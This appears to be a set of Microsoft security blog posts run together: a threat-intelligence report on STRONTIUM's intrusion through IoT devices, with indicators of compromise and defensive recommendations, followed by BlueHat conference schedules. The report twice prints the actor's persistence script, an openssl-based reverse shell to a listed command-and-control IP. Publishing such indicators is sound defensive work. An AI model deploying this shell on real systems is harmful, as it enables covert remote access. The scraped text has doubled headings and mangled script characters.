There were also multiple press reports of cyber-attacks on several devices during the opening ceremonies for the 2018 Olympic Games in PyeongChang. Officials did confirm a few days later that they were a victim of malicious cyber-attacks that prevented attendees from printing their tickets to the Games and televisions and internet access in the main press center simply stopped working.

**Three IoT devices Three IoT devices**

In April, security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices. Further research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device.

These devices became points of ingress from which the actor established a presence on the network and continued looking for further access. Once the actor had successfully established access to the network, a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data. After gaining access to each of the IoT devices, the actor ran _tcpdump_ to sniff network traffic on local subnets. They were also seen enumerating administrative groups to attempt further exploitation. As the actor moved from one device to another, they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting. Analysis of network traffic showed the devices were also communicating with an external command and control (C2) server.

\--contents of_[IOT Device]_\` file–

**!/bin/sh !/bin/sh**

export _\[IOT Device\]_`` ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((cat /tmp/.c\`+1)) && echo $cn|tee /tmp.c && if \[ $cn -ge 30 \]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &

–end contents of file–\`\`

_Figure 1: script used to maintain network persistence_

The following IP addresses are believed to have been used by the actor for command and control (C2) during these intrusions:

167.114.153.55

94.237.37.28

82.118.242.171

31.220.61.251

128.199.199.187

**Attribution Attribution**

We attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM. Since we identified these attacks in the early stages, we have not been able to conclusively determine what STRONTIUM’s ultimate objectives were in these intrusions.

Over the last twelve months, Microsoft has delivered nearly 1400 nation-state notifications to those who have been targeted or compromised by STRONTIUM. One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations, think tanks, or politically affiliated organizations around the world. The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors: government, IT, military, defense, medicine, education, and engineering. We have also observed and notified STRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry. The “VPN Filter” malware has also been attributed to STRONTIUM by the FBI.

**Call to action Call to action**

Today we are sharing this information to raise awareness of these risks across the industry and calling for better enterprise integration of IoT devices, particularly the ability to monitor IoT device telemetry within enterprise networks. Today, the number of deployed IoT devices outnumber the population of personal computers and mobile phones, combined. With each networked IoT device having its own separate network stack, it’s quite easy to see the need for better enterprise management, especially in today’s “bring your own device” world.

While much of the industry focuses on the threats of hardware implants, we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives. These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments. Upon conclusion of our investigation, we shared this information with the manufacturers of the specific devices involved and they have used this event to explore new protections in their products. However, there is a need for broader focus across IoT in general, both from security teams at organizations that need to be more aware of these types of threats, as well as from IoT device makers who need to provide better enterprise support and monitoring capabilities to make it easier for security teams to defend their networks.

**Indicators of Compromise Indicators of Compromise**

Below are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article.

**Command-and-Control (C2) IP addresses Command-and-Control (C2) IP addresses**

167.114.153.55

94.237.37.28

82.118.242.171

31.220.61.251

128.199.199.187

**Script for maintaining persistence on network connected device Script for maintaining persistence on network connected device**

--contents of_[IOT Device]_\` file–

**!/bin/sh !/bin/sh**

export _\[IOT Device\]_`` ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((cat /tmp/.c\`+1)) && echo $cn|tee /tmp.c && if \[ $cn -ge 30 \]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &

–end contents of file–\`\`

**Recommendations for Securing Enterprise IoT Recommendations for Securing Enterprise IoT**

There are additional steps an organization can take to protect their infrastructure and network from similar activity. Microsoft recommends the following actions to better secure and manage risk associated with IoT devices:

1.  Require approval and cataloging of any IoT devices running in your corporate environment.
2.  Develop a custom security policy for each IoT device.
3.  Avoid exposing IoT devices directly to the internet or create custom access controls to limit exposure.
4.  Use a separate network for IoT devices if feasible.
5.  Conduct routine configuration/patch audits against deployed IoT devices.
6.  Define policies for isolation of IoT devices, preservation of device data, ability to maintain logs of device traffic, and capture of device images for forensic investigation.
7.  Include IoT device configuration weaknesses or IoT-based intrusion scenarios as part of Red Team testing.
8.  Monitor IoT device activity for abnormal behavior (e.g. a printer browsing SharePoint sites…).
9.  Audit any identities and credentials that have authorized access to IoT devices, users and processes.
10.  Centralize asset/configuration/patch management if feasible.
11.  If your devices are deployed/managed by a 3rd party, include explicit Terms in your contracts detailing security practices to be followed and Audits that report security status and health of all managed devices.
12.  Where possible, define SLA Terms in IoT device vendor contracts that set a mutually acceptable window for investigative response and forensic analysis to any compromise involving their product.

_This case is one of several examples that__Eric Doerr will present at Black Hat__, on August 8, 2019, where Microsoft is calling for greater industry transparency to ensure that defenders are best equipped to respond to threats from well-resourced adversaries._

_Microsoft Threat Intelligence Center (MSTIC)_

Corporate IoT - a path to intrusion

The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 2.6.32 and up to and including 4.13.1, are vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space.

CVE-2017-1000251: BlueBorne

September is here! The dash from the close of the call for papers to now has been amazing. We had nearly two hundred submissions spanning the gamut of security topics and presenters. The result is a solid schedule that will challenge and educate all attendees. On behalf of the content advisory board, I want to thank everyone who submitted a paper for consideration.

September is here! The dash from the close of the call for papers to now has been amazing. We had nearly two hundred submissions spanning the gamut of security topics and presenters. The result is a solid schedule that will challenge and educate all attendees. On behalf of the content advisory board, I want to thank everyone who submitted a paper for consideration. There were a lot of great ideas, but we could not put all of them on stage for this instance of BlueHat. We look forward to continuing the security conversation with you in the future.

Microsoft is proud to announce the schedule for the BlueHat v17 Security Conference.

**Wednesday, November 8th, 2017 | General Audience**

**TRACK**

**Time**

**Speaker**

**Company**

**Talk Subject**

**KEYNOTE**

9:00 – 9:50 AM

Merike Kaeo

Farsight Security

Keynote

**Track 1 -Encrypt all the things**

10:00 – 10:50 AM

Alban Diquet  
Thomas Sileo

Data Theorem

Where, how, and why is SSL traffic on mobile getting intercepted? A look at three million real-world SSL incidents

11:00 – 11:50 AM

Joseph Salowey

Tableau Software

TLS 1.3 – Full speed ahead… mind the warnings – the great, the good and the bad

**Track 1 – Battles in Silicon**

1:00 – 1:50 PM

Alex Matrosov

Cylance

Betraying the BIOS: Where the Guardians of the BIOS are Failing

2:00 – 2:50 PM

Niek Timmers  
Cristofaro Mune

Riscure B.V. &

Independent Embedded Security Consultant

KERNELFAULT: R00ting the Unexploitable using Hardware Fault Injection

3:00 – 3:50 PM

Rob Turner

Qualcomm Technologies

Raising the Bar: New Hardware Primitives for Exploit Mitigations

4:00 – 4:50 PM

Gunter Ollmann

Microsoft

Extracting Secrets from Silicon – A New Generation of Bug Hunting

**Track 2 – Hey Microsoft, you got it wrong!**

10:00 – 10:50 AM

Casey Smith

Red Canary

You Are Making Application Whitelisting Difficult

11:00 – 11:50 AM

Yong Chuan Koh

MWR Infosecurity

Corrupting Memory in Microsoft Office Protected-View Sandbox

**Track 2 – Advancing products meet the new threats**

1:00 – 1:50 PM

Saruhan Karademir

David Weston

Microsoft

Securing Windows Defender Application Guard

2:00 – 2:50 PM

Mark Wodrich

Jasika Bawa

Microsoft

Mitigations for the Masses: From EMET to Windows Defender Exploit Guard

3:00 – 3:25 PM

Dean Wells

Microsoft

Don’t let your virtualization fabric become the attack vector

3:30 – 3:55 PM

Jonathan Birch

Microsoft

Dangerous Contents – Securing .Net Deserialization

4:00 – 4:50 PM

Filippo Seracini

Lee Holmes

Microsoft

Born secure. How to design a brand new cloud platform with a strong security posture

**Thursday, November 9th, 2017 | General Audience**

**TRACK**

**Time**

**Speaker**

**Company**

**Talk Subject**

**Track 1 – I swear it wasn’t me!**

9:00 – 9:50 AM

Kymberlee Price  
Sam Vaughan

Microsoft

Down the Open Source Software Rabbit Hole

10:00  – 10:50 AM

Sean Metcalf

Trimarc

Active Directory Security: The Journey

11:00 – 11:50 AM

Alex Ionescu

Crowdstrike

Baby’s First Bounty: Lessons from bypassing Arbitrary Code Guard

**Track 1 – Cloud Chasing**

1:00 – 1:50 PM

Nate Warfield  
Ben Ridgway

Microsoft

All your cloud are belong to us; hunting compromise in Azure

2:00 – 2:25 PM

Oran Brill  
Tomer Teller

Microsoft

Go Hunt: An automated approach for security alert validation

2:30 – 2:55 PM

Matt Swann

Microsoft

Scaling Incident Response – 5 keys to successful defense at scale

3:00 – 3:50 PM

Greg Foss

LogRhythm

PIE – An Active Defense PowerShell Framework for Office365

4:00 – 4:50 PM

Mathias Scherman  
Daniel Edwards  
Tomer Koren

Microsoft

Leveraging Honeypots to Train a Supervised Model for Brute-Force Detection

**Track 2 – Phishing for Trust**

9:00 – 9:50 AM

Billy Leonard

Google

10 Years of Targeted Credential Phishing

10:00 – 10:50 AM

Alex Weinert  
Dana Kaufman

Microsoft

Account Compromise 2017: in the Trenches with the Microsoft Identity Security and Protection Team

11:00 – 11:50 AM

Yacin Nadji

Georgia Institute of Technology

28 Registrations Later: Measuring the Exploitation of Residual Trust in Domains

**Track 2 – Attacking Products**

1:00 – 1:50 PM

Lei Shi  
Mei Wang

Qihoo 360

Out of The Truman Show: VM escape in VMware gracefully

2:00 – 2:50 PM

Matt Nelson

SpecterOps

“\_\_\_\_\_ Is Not a Security Boundary.” Things I Have Learned and Things That Have Gotten Better from Researching Microsoft Software

3:00 – 3:50 PM

Alexander Chistyakov

Kaspersky Lab

Detection is not a classification: reviewing machine learning techniques for cybersecurity specifics

4:00 – 4:50 PM

Andrea Lelli

Microsoft

WannaCrypt + SMBv1.0 vulnerability = One of the most damaging ransomware attacks in history

**Track 3 -Threat Intelligence**

9:00 – 9:50 AM

Nick Anderson

Facebook

Detecting compromise on Windows endpoints with osquery

10:00 – 10:50 AM

Brian Hooper  
Jagadeesh Parameswaran

Microsoft

Tales from the SOC: Real-world Attacks Seen Through Defender ATP

11:00 – 11:50 AM

Mark Parsons

Microsoft

Using TLS Certificates to Track Activity Groups

1:00 – 1:50 PM

Chaz Lever

Georgia Institute of Technology

A Lustrum of Malware Network Communication: Evolution and Insights

2:00 – 2:50 PM

Andrew Brandt

Symantec

Dyre to Trickbot: An inside look at TLS-encrypted command-and-control traffic

3:00 – 3:25 PM

Alexis Dorais-Joncas  
Thomas Dupuy

ESET

Sednit Reloaded: The Bears’ Operations From Christmas to Halloween

3:30 – 4:50 PM

Chuck McAuley

Ixia Communications

Disrupting the Mirai Botnet

****View full Conference Agenda and Talk Abstracts** **View full Conference Agenda and Talk Abstracts****

Planning for the conference is well underway. This year we have secured the entire conference center so that we can accommodate even more participants. For external community members this is an invite-only conference. The initial round of external invites will go out later today with details on how to register and the timeframe for response. The registration site is live for external participants. Keep watching here for more updates as we get closer to the event.

**About BlueHat About BlueHat**

BlueHat v17 is a two-day security conference for general audiences. It will be held November 8-9, 2017 at the Microsoft Conference Center here in Redmond. This year will see a larger event, over one thousand people expected in person, as BlueHat welcomes partners from the Microsoft Security Response Alliance Summit. The conference is open to invited external guests and Microsoft employees and contingent staff. More details on logistics and about the conference will be posted throughout the summer and fall here on the BlueHat blog. Check back to get the latest here. We look forward to hearing from you and meeting you again in November.

Phillip Misner,

Principal Security Group Manager, MSRC

BlueHatv17-Survey-Completion-Give-Away-Rules-And-Winners

Announcing the BlueHat v17 Schedule

It’s that time of year and BlueHat v14 is almost upon us. As always, BlueHat is an opportunity for us to bring the brightest minds in security together, both internal and external, to discuss and tackle some of the hardest problems facing the industry today. Through this conference, our engineering teams get deep technical information and education on the latest threats from proven industry experts.

/ By bluehat / October 06, 2014 / 7 min read

It’s that time of year and BlueHat v14 is almost upon us. As always, BlueHat is an opportunity for us to bring the brightest minds in security together, both internal and external, to discuss and tackle some of the hardest problems facing the industry today. Through this conference, our engineering teams get deep technical information and education on the latest threats from proven industry experts.

BlueHat kicks off on October 9th where we will spend the day focusing on researcher methodologies such as fuzzing, red team assessments, malware analysis and BIOS attacks. On the second day, we will have three tracks starting with Security & Identity, followed by State of the Hack (focusing on next generation of advanced persistent threats and web exploit detection) and then finally, we will end with Security in Deployed Environments.

We are very excited about interaction between Microsoft engineers and other top security experts who are coming to speak at the event. Here is a list of their talks:

\*Please note that this schedule is subject to change.

**October 9th, 2014**

**START**

**END**

**SPEAKER**

**TALK TITLE**

9:00 AM

9:40 AM

Chris Betz

**Keynote**

9:40 AM

10:20 AM

Stefano Zanero

**Botintime - Phoenix: DGA-based Botnet Tracking and Intelligence** Its common knowledge that a malicious domain automatically generated will not become popular and also an attacker will register a domain with a Top Level Domain that does not require clearance. Hence, we use phoenix which filters out domains likely to be generated by humans. The core of Phoenix is its ability to separate DGA from non-DGA domains, using linguistic features.

10:20 AM

10:35 AM

Break

10:35 AM

11:15 AM

Scott Longheyer

**Government Snooping Potentially Now Constitutes an Advance Persistent Threat** Security is the application of Privacy’s intentions, so open the pocketbook and check your ciphers. Gain a deeper understanding of Microsoft’s position on privacy and how online services intend to protect customer data.

11:15 AM

11:55 AM

Stefano Zanero

**Jackdaw talk - Automatic Malware Behavior Extraction and Tagging** This talk will focus on our approach for extracting (interesting) behavior specifications in an automatic way from a large collection of (untagged) malware. If you wonder why? It’s because we believe in giving support to the analyst by providing a list of important behaviors, with a rough explanation, to prioritize the analysis.

11:55 AM

12:55 PM

Lunch

12:55 PM

1:15 PM

Xeno Kovah

**UEFI - What would it take to enable global firmware vulnerability & integrity checking?** This talk will describe what actions are being taken to improve security for PC firmware, and what different groups in Microsoft can do to help.

1:15 PM

1:35 PM

Yuriy Bulygin

**UEFI - Summary of Attacks against BIOS and Secure Boot** A variety of attacks targeting platform firmware have been discussed publicly, drawing attention to the pre-boot and firmware components of the platform such as BIOS and SMM, UEFI secure boot and Full Disk Encryption solutions. This talk will detail and organize some of the attacks and how they work. We will cover attacks against BIOS write protection, attacks leveraging hardware configuration against SMM memory protections, attacks using vulnerabilities in SMI handlers, attacks against BIOS update implementations, attacks bypassing secure boot, and various other issues. We will describe underlying vulnerabilities and how to assess systems for these issues. After watching, you should understand how these attacks work, how they are mitigated, and how to verify if your system has any of these problems.

1:35 PM

2:15 PM

Josh Thomas

**Behind the NDA: How to attack a product under deadline** This talk will focus on a brief security assessment of the Windows Phone / Nokia Lumia platforms with the intent of exploring attack methodologies. This talk will focus on how we as consultants approach a new problem / technology and how we can quickly become productive on new and previously unknown / unexplored hardware and software components.

2:15 PM

2:35 PM

Sergey Bratus, Julian Bangert

**Defining and Enforcing Intent Semantics at ABI level** Dominant OS security policy designs treat a process as an opaque entity that has a “bag” of permissions to access some OS resources at any time, in any order. Now that the sensitive data that we most want to protect may never touch the filesystem or even cross a process boundary, these designs fail at their purpose. We introduce a design that has a much higher granularity of protection, yet is compatible with existing ABI, standard build chains, and binary utilities.

2:35 PM

2:50 PM

Break

2:50 PM

3:30 PM

Andrew Ruef

**Build It Break It Competition** We created a competition where students design and implement secure programs, and identify bugs in each other’s programs. We’ll talk about the design of the competition, the data we’ve gathered from executing the competition, our plans for future competitions, and what the data is telling us about software security, programming languages, education, and software development.

3:30 PM

4:10 PM

Ram Shankar Siva Kumar, John Walton

**Subverting machine learning detections for fun and profit** If you are using Machine learning in your feature, it can be attacked! This talk is a primer on Adversarial Machine learning wherein we show how attackers can manipulate machine learning systems to get the result they want you to see. You will learn how to protect yourself and detect such attacks. You don’t need to know about Machine learning to attend this talk – we’ve got you covered.

4:10 PM

4:40 PM

Lightning Talks

**October 10th, 2014**

9:00 AM

10:00 AM

Lightning Talks & Breakfast

10:00 AM

10:40 AM

Benjamin Delpy, Chris Campbell, Skip Duckwall

**The Attacker’s View of Windows Authentication and Post Exploitation part 1** This talk will focus on the how Windows authentication works in the real world and what are the popular attacks against it. You will learn the thought process of attackers in the real world and how it differs from a defender’s perspective. We’ll also cover post-exploitation tools and techniques such as Mimikatz. Finally, we’ll discuss next steps – How do you design services that are breach-resistant and make authentication harder to crack.

10:40 AM

11:20 AM

Benjamin Delpy, Chris Campbell, Skip Duckwall

**The Attacker’s View of Windows Authentication and Post Exploitation part 2**

11:20 AM

11:35 AM

Break

11:35 AM

12:15 PM

Ho John Lee

**Privacy and Security in a Personalized Services World** An introduction and discussion of current policy issues around personalized mobile and cloud-based knowledge services. In this talk you will learn about some of the privacy and policy issues associated with large scale, cloud based personalization that are different from those in web search, email, or social networks. I will also present some concepts and patterns for building mobile and personalized services that honor individual user data obligations while also enabling offline data analysis and global, low latency serving infrastructure.

12:15 PM

12:55 PM

Bo Qu

**The failure and success in IE fuzzing** The road to success is often paved with failure. In this presentation we will discuss the mistakes and challenges we overcame while developing our fuzzer that has successfully discovered over 100 vulnerabilities in Internet Explorer. Welcome to the school of hard knocks!

12:55 PM

1:55 PM

Lunch

1:55 PM

2:35 PM

John Walton

**Next Generation Advanced Persistent Threat™** What will tomorrow’s threat landscape, look like? How can attacks become even more advanced than we are observing today? What will the adversary’s arsenal contain? The Next Generation Advanced Persistent Threat™ talk will peer into the future and these exact questions. Come discover how we will continue to be outmaneuvered during every phase of the cyber kill chain

2:35 PM

2:55 PM

David Finn

**Fighting Cybercrime with Big Data** The Microsoft Digital Crimes Unit (“DCU”) is a team of about 100 people, including former prosecutors, law enforcement officials, security analysts, investigators, attorneys, and intelligence analysts, dedicated to the fight against global cybercrime. In this presentation about DCU’s CSI-like blend of crime fighting and technology, find out how Big Data and analytics is revolutionizing everything DCU does – helping protect internet users, and disrupting and dismantling criminal organizations all over the world.

2:55 PM

3:10 PM

Break

3:10 PM

3:30 PM

Alexandra Savelieva, Daniel Eshner, Nuwan Ginige, Mohammad Usman

**Data Isolation In Multitenant Cloud Environment** In our talk, you’ll learn about a new solution that we built to address the problem of managing access to data across various fabrics and processing environments to mitigate top security threats of a cloud-based distributed application platform shared by multiple partners, including isolation of mutually distrustful tenant applications running side-by-side on a commodity server.

3:30 PM

4:30 PM

Daniel Edwards

**Engineer’s guide to DDOS** Are you ready to discuss DDoS? Can your online service be weaponized to attack? It’s already happened to others. Is yours next?

**Related Posts**

*   Hey Yara, find some vulnerabilities
*   Microsoft Vulnerability Severity Classification for Online Services Publication
*   マイクロソフトのオンラインサービスにおける、脆弱性の深刻度分類の公開

Tag

#botnet